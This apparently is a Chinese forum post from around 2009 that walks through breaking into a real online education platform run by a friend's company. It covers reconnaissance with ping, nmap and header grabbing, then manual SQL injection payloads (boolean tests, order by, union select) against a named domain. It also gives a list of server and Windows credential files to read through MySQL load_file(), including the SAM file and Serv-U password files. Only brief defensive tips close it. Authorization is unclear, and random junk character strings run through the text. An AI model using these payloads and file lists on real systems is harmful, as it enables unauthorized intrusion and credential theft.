题记:- c8 I1 R+ _, p) w1 O$ f( s4 s
一位朋友在某教育公司,一套网络教育平台。一年前,在2008年8月份的时候,我看到了这套平台,当时发现了个注入漏洞,测试了一下,得到一个可用帐户后就没有再继续下去。今天7月,又说到此事,我决定继续下去……
# ^5 n3 W7 `/ J6 T7 j a4 a第一步:获取需要的信息1 k: T) \. J; {2 A$ H- @
由于之前测试过,知道此系统某处存在SQL注入漏洞。但由于时隔一年,岁月的远去已经深深的隐藏了那个SQL注入漏洞的地址,现在需要重新收集服务器有用信息。. `4 }9 ]' e* S4 D; [
注:以下为保护特用XXX代替敏感信息
+ l9 r( Q, |" T! V. w, y顺手先PING了一下他们的域名:% H7 h8 |! a# p
ping XXX.XXX.XXX.XXX(本文约定:用XXX.XXX.XXX.XXX代表测试IP和域名)7 B$ u% ^1 D5 v% h4 F8 C
64 bytes from *********: icmp_seq=1 ttl=246 time=1.87 ms, {6 \3 a8 {9 D0 o
顺便了解一下TTL,学好基础知识才能一路顺风:
% M) b+ K# g4 b6 k1 qTTL:(Time To Live ) 生存时间& ]& y+ i8 {) B
指定数据包被路由器丢弃之前允许通过的网段数量。
1 f" } P" q. R! \TTL 是由发送主机设置的,以防止数据包不断在 IP 互联网络上永不终止地循环。转发 IP 数据包时,要求路由器至少将 TTL 减小 1。9 f* p& J$ _* d" }: P) }
使用PING时涉及到的 ICMP 报文类型
0 M* y/ d7 F0 o9 B( M一个为ICMP请求回显(ICMP Echo Request)( p6 u; N) \3 q( I! ~4 i: N
一个为ICMP回显应答(ICMP Echo Reply)
7 R1 R" b: C% F" C5 }6 b7 A# CTTL 字段值可以帮助我们识别操作系统类型。2 S$ @ T/ ~- _' O
UNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 255+ g" z8 z/ l, k
Compaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64% i7 X2 l! i A
微软 Windows NT/2K操作系统 ICMP 回显应答的 TTL 字段值为 128
4 v$ N2 }+ J. i微软 Windows 95 操作系统 ICMP 回显应答的 TTL 字段值为 32
1 E/ C2 _+ u/ c- y+ ]当然,返回的TTL值是相同的( ^8 S9 u2 Q3 `, Z* d! Z
但有些情况下有所特殊( C2 X+ L: l& p" Y/ u8 ]2 U
LINUX Kernel 2.2.x & 2.4.x ICMP 回显应答的 TTL 字段值为 64" U; s1 ~8 Y/ f* b% y) g7 L8 n
FreeBSD 4.1, 4.0, 3.4;$ M) d, L) A3 C5 _/ n3 ?
Sun Solaris 2.5.1, 2.6, 2.7, 2.8;% @3 k% U+ I7 y: \
OpenBSD 2.6, 2.7,$ o% m; S/ d# H4 o7 [2 J6 |& y7 I$ `
NetBSD
- c- Y7 l% G( C+ Y: p9 w! mHP UX 10.20
% Y" ]% l. @( _# cICMP 回显应答的 TTL 字段值为 255 Z$ k- M% _* K9 ?
Windows 95/98/98SE
: Y+ Q% {1 r+ m1 C$ `Windows ME
8 J' ^$ V9 F1 z7 n( Q* |ICMP 回显应答的 TTL 字段值为 32
+ B& T: x5 R3 ]( Z8 gWindows NT4 WRKS
- n4 S# C7 t( p) fWindows NT4 Server3 ~! i: ^3 _# ~4 q- e3 M! h M
Windows 2000" s8 [0 G8 w; f3 D" ^
Windows XP7 O6 S! H% Z' K3 @% O& t3 G
ICMP 回显应答的 TTL 字段值为 1284 Q ~* @ i; a
这样,我们就可以通过这种方法来辨别操作系统
" ]6 \) y, @) w7 M5 F; |# MTTL值的注册表位置HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Services\Tcpip\Parameters 其中有个DefaultTTL的DWORD值,其数据就是默认的TTL值了,我们可以修改,但不能大于十进制的255' U, x% }/ W y1 ~* _9 r
用NMAP扫描一下:
) G0 y$ X+ D! `0 J/ h5 vnmap -sT -O XXX.XXX.XXX.XXX
* k$ N1 z8 C' t如果没有装WinPcap则会弹出提示:
/ C( T8 ~5 X* z. c, z# `( E4 tWARNING: Could not import all necessary WinPcap functions. You may need to upgr) i6 T; `: K' E( K0 m8 d8 F
ade to version 3.1 or higher from http://www.winpcap.org. Resorting to connect(
; W Z; ?3 @+ Y* R: ]) mode — Nmap may not function completely
& S. U; Q: w& E J" g) P; x4 ]TCP/IP fingerprinting (for OS scan) requires that WinPcap version 3.1 or higher
2 I7 N* v# t& W! [8 A) dand iphlpapi.dll be installed. You seem to be missing one or both of these. Win
; y; |6 u& q+ _; C1 `7 ~pcap is available from http://www.winpcap.org. iphlpapi.dll comes with Win98 an6 ]# c4 D" D, u; v: C# h
d later operating sytems and NT 4.0 with SP4 or greater. For previous windows v: v) @. d4 i4 W' K
ersions, you may be able to take iphlpapi.dll from another system and place it i
% L7 N2 R, ^3 n0 ]n your system32 dir (e.g. c:\windows\system32).- j: r( s# f2 i! _& B5 u
QUITTING!
) U% v: V# m' o/ W, s7 J( B到这里下载: http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe
* G: ^; n) Z. L9 w- i安装后继续执行刚才的命令,等待扫描完毕后得到入下信息:
( y" R8 y% K! GInteresting ports on XXX.XXX.XXX.XXX:
: P! H! ] z2 A' A4 E: ?3 j% SNot shown: 986 closed ports! f- k& N% r& e* M9 T
PORT STATE SERVICE! n/ K4 x% z+ C* p
21/tcp open ftp+ D, `0 U" H" J: e6 `
22/tcp open ssh; ~: x; d- @1 A X5 Y; \7 L
23/tcp open telnet
/ z- I: j4 l4 A8 l1 J, Z80/tcp open http- v3 H, _ [3 x% M$ n: i( W
111/tcp open rpcbind
2 {" \% m" O6 d. C135/tcp filtered msrpc
4 V, D& R P8 `4 _9 z0 l+ a139/tcp filtered netbios-ssn
' D6 x6 h) N2 p& e: ]445/tcp filtered microsoft-ds' e! h! {) c* C3 y
513/tcp open login
. P, w4 s' h8 q7 ^3 `514/tcp open shell
5 `; S, V b. x f8 | m593/tcp filtered http-rpc-epmap
- A$ ~' V1 \0 A* F+ C1720/tcp filtered H.323/Q.931: k- t" T( E; D
3306/tcp open mysql4 \* J6 d% c2 s5 H4 ^0 j. j1 q
4444/tcp filtered krb524
* \, P& `5 ]' ?Device type: WAP! i% ^2 v$ _: Y5 d- J9 w2 h
Running: Linux 2.4.X$ G0 S& u1 D: v8 O& m
OS details: DD-WRT (Linux 2.4.35s)# O% y& a0 m6 K( A
Network Distance: 13 hops
; w- H( k+ N$ ^2 |5 w看到SSH22端口是开着的,打开putty试一下,看是否可以正常连接:0 u& E6 n# R- S' Y
login as:* J/ P2 M t1 d% v0 _7 m9 _
Telnet23端口也是开着的,用telnet 命令链接一下:, N' L, Y$ D7 u: l& U
telnet XXX.XXX.XXX.XXX! T; w! z5 m9 q+ [' J
提示:
% F, U9 v& y, _3 b6 {) tRed Hat Enterprise Linux Server release 5.2 (Tikanga)
# C6 d4 f& ]0 C) ~: s4 dKernel 2.6.18-92.el5PAE on an i6860 y9 P7 m1 i+ }9 ]! o, Z
login:( s! L2 U4 [9 A2 g7 J7 w
获取HTTP头信息:
- t( z0 I5 F6 |! |3 w在本地执行如下PHP代码: o% o) g6 x8 f* S+ M
<?php% ]! N$ u0 E: M3 z0 P
$url = ‘XXX.XXX.XXX.XXX’;
1 m- N+ r# y; n lprint_r(get_headers($url));% n) M& A: v1 n4 n
print_r(get_headers($url, 1));
' u9 ?3 c7 Z( r/ ~8 G; H?>
0 l! E! g4 H; g! }将以上代码保存为PHP文件,执行:
) w8 j. s% k' L/ C$ TArray ( [0] => HTTP/1.1 200 OK [1] => Server: nginx/0.7.61 [2] => Date: Mon, 02 Nov 2009 09:06:48 GMT [3] => Content-Type: text/html; charset=gb2312,gbk,utf-8 [4] => Content-Length: 75 [5] => Last-Modified: Thu, 20 Aug 2009 19:35:37 GMT [6] => Connection: close [7] => Accept-Ranges: bytes ) Array ( [0] => HTTP/1.1 200 OK [Server] => nginx/0.7.61 [Date] => Mon, 02 Nov 2009 09:06:48 GMT [Content-Type] => text/html; charset=gb2312,gbk,utf-8 [Content-Length] => 75 [Last-Modified] => Thu, 20 Aug 2009 19:35:37 GMT [Connection] => close [Accept-Ranges] => bytes )
% x: I0 o2 ?6 s现在可以得出结论:0 a' \. n2 @# G1 E; y
系统版本:Red Hat Enterprise Linux Server release 5.2 (Tikanga)
* ?) ?( Z1 Z0 f! r8 ] b' @5 B内核版本:Kernel 2.6.18-92.el5PAE on an i6863 R# j" Y4 A4 V9 }' S
WEB服务器版本:nginx/0.7.61" ^9 l3 G% }$ L
第二步,开始测试寻找漏洞
; u5 i9 z. l! t% x9 v1 A分析是否存在注入漏洞,因为上次曾发现存在过,所以注入则是我们的首选。+ _- x- T9 b6 s
1、敏感地址:站内存在有类似:http://www.fovweb.com/XXX.php?id=123 这种地址,属动态传参的3 E: U% b2 R' M3 `; K1 k
2、测试方法:在地址后加 and 1=1 和 and 1=2 测试
) U+ ^1 U. U6 |; uhttp://www.fovweb.com/XXX.php?id=123 and 1=1 返回正常
' ?+ H) E' A6 [5 a- v" w5 Ohttp://www.fovweb.com/XXX.php?id=123 and 1=2 返回错误" n8 W2 V2 {. X
恭喜,两次返回结果不同,则很有可能存在未过滤敏感字符而存在SQL注入漏洞,我们继续/ C. Y+ R% \6 z0 ]4 O( f: l
3、手工注入:
9 ?: O0 F2 Y, e6 u( J0 j( B: f0 O注入也应该有个思路,不能随便碰运气,要记住入侵检测不是靠运气而走下去的,要靠的是清晰的思路、过硬的技术、很全的知识面。7 [0 T' ^2 z- r d
3.1 猜测当前表字段数
% ^ _7 H# E' _4 I' B2 Yhttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 10, [# _9 @0 ~% o T; j- ^7 e$ p
此处猜测有个简单的算法,都是有技巧的吗,呵呵+ S7 N& [8 u% q9 O. R- ]3 U" \# |
算法简单如下:! ^' a% e# N) J; Q# ~4 _ }
第一步:根据页面信息,大概估算一个数值,这个是要靠一定的经验了;
" o6 L4 h1 `$ A3 D" Z! O第二步:取中算法,好比是10,如果返回错误,则取中间值5进行下一次猜测;+ k0 V1 d" g6 ?
需要注意:如果所选数值在字段数范围内即小于等于,则会(返回正常);如果所选数值在字段范围外即大于等于,则会(返回错误)。/ v* ?; |* _9 l, k
以此来判断,是否过界,配合取中算法猜出字段数。9 W6 f+ G0 z) W! c, m+ d6 u
举例:
: n7 r' v/ I2 C9 a$ N: v8 j6 ^7 phttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 3 返回正常
9 _* o- S" o$ t" Y- U# Fhttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 4 返回错误
1 n0 O0 G9 ^6 M9 {此时3则为我们要找的字段数。
- A+ T2 P5 _4 s) L7 t* m9 y3.2 配合union联合查询字段在页面所位置
6 D% q9 z7 d% e/ O" x; L8 D我们已经知道了字段数为3,此时则可以做如下操作:3 t+ ^# V2 B: F) ~% A& W1 N+ C
http://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,2,3
: v) E3 c4 `; e/ ]4 \' V. e$ I6 y! ?! Y
这样就可以测试到哪些字段在页面上有所显示了,如图:8 y* F, o) H4 g7 ~( [5 x
0 b/ X4 e. W/ d0 E. l6 R: K( S! E/ Y
3.3 查敏感信息
/ o8 h7 C" W; H% m- K这也是个思路问题,我们需要什么,其实到了这一步已经能做什么多事情了。 D8 }# O/ m/ k8 L' J7 [
http://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,user(),database()
+ @9 n' b' W y' h3.3.1 先查数据库用户、数据库名,以备后用,如图:9 o) s. q: r& Y% Z5 o) z
' K6 d" r; O6 p( N得到数据库用户为root、数据库名为DBxx;' V4 d6 ~; q+ ^7 r* T
3.3.2 查配置文件: Q& ^. e' G, ?
查配置文件,就是指查看系统敏感的文件,如web服务器配置文件等。: |5 n- W* B1 Q7 \3 V5 q# p: z& R
查看文件有一定的条件限制:% n9 |- M8 `$ d; `# {: X% |
欲读取文件必须在服务器上9 W; u1 v, p& j
必须指定文件完整的路径
$ n d+ Q4 Y9 I" C1 O( L必须有权限读取并且文件必须完全可读4 q* `7 q( d9 f/ R
欲读取文件必须小于 max_allowed_packet6 S8 g& f8 `* ?6 e3 h3 X/ d8 P) r0 i
MYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件。
+ g2 @, u6 h4 h; u/ A) n常用的一些:
% ?* M) s( w* s$ p: x% K/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件3 K7 T4 h# J/ w. S* E4 o5 ]
/usr/local/apache2/conf/httpd.conf& L( w5 ^* Y5 S) h s- s
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置0 H& w4 V- D* G% ~$ u
/usr/local/app/php5/lib/php.ini //PHP相关设置
1 S( J: p8 i5 P/etc/sysconfig/iptables //从中得到防火墙规则策略- q5 ?' E7 {" C: k1 M
/etc/httpd/conf/httpd.conf // apache配置文件
7 o- ?0 _+ Y) [8 y7 G/etc/rsyncd.conf //同步程序配置文件
9 y6 A; v7 L2 o7 ^3 Z Z/ @/etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP.' ?( V" \6 |( E5 W9 S4 ?
/etc/my.cnf //mysql的配置文件
- x' G0 g. s; V5 _3 ? y/etc/redhat-release //系统版本0 S0 G, f2 u- K' o/ z
/etc/issue
* S: z V' X m! N) R/etc/issue.net% h3 F6 G: E" J# N% k
c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码
, d3 |9 ~( r( T/ Tc:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码+ x* n0 A9 l5 A- T2 k3 e
c:\Program Files\Serv-U\ServUDaemon.ini
6 m0 c8 }8 g2 d& r: R$ L$ M3 |c:\windows\my.ini //MYSQL配置文件) ]0 W% E5 o6 [( h2 t
c:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件9 v/ M; O- N* S5 d( w% `$ N
等等。实际上,load_file()的作用不止于此,它还可以用来读取系统中的二进制文件,& ~* O$ i" b* Y$ N. x1 O
c:\windows\repair\sam //存储了WINDOWS系统初次安装的密码 ^' X* o, Q$ V6 v
c:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此0 ?! I5 h$ Z4 r
c:\Program Files\RhinoSoft.com\ServUDaemon.exe' T9 D/ z( z# Z, B/ }; i2 ]! ^$ e
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
0 p4 J f9 E- H% l! v* S1 y. ^; n' R//存储了pcAnywhere的登陆密码( Z! D8 Z# Z& D
由于之前得到信息,此台服务器是采用的nginx做的Web服务器,那我们就来试着找一下nginx的安装路径吧。9 I4 U. x; p7 H9 q$ L; K
这个没有技术性可言,纯靠经验和运气,由于很少用nginx不了解,我就先到网上搜索常用的安装路径,以及比较好的配置文档中的安装路径进行测试,最终,得到nginx安装路径“/usr/local/nginx/conf/nginx.conf”。
! i. U0 o% d( }/ f9 J6 {% H最后:防范措施) Q/ ]. { W, F9 m
1、修复PHP注入漏洞;" q$ E' p7 }. l9 d) H! Y- c
2、Mysql使用普通权限的用户;9 D$ e4 `5 u9 m$ k, [. w/ s- c) Z
3、升级linux内核至最新版本; |